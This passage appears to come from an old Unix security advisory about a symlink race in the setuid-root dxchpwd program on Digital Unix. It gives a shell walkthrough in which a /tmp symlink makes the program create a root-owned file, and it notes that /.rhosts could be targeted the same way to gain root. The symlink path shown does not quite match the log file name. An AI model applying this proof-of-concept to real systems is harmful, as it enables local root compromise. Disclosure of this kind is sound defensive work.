In this case, if /.rhosts were symlinked to /tmp/dxchpwd.log, then a
host known as Unknown could possibly gain root access.

Example:
$ ls -l /usr/tcb/bin/dxchpwd
-rwsr-xr-x   1 root     bin        49152 Jul 25  1995 /usr/tcb/bin/dxchpwd
$ ls -l /tmp/dxchpwd.log
/tmp/dxchpwd.log not found
$ export DISPLAY=:0     (or a remotehost)
$ ln -s /hackfile /tmp/dxchpwd
$ ls -l /hackfile
/hackfile not found
$ /usr/tcb/bin/dxchpwd
(The dxchpwd window will appear. Just enter root for username
 and anything for the passwd. You'll get a permission denied
message and the window will close.)
$ ls -l /hackfile
-rw-------   1 root     system         0 Nov 16 22:44 /hackfile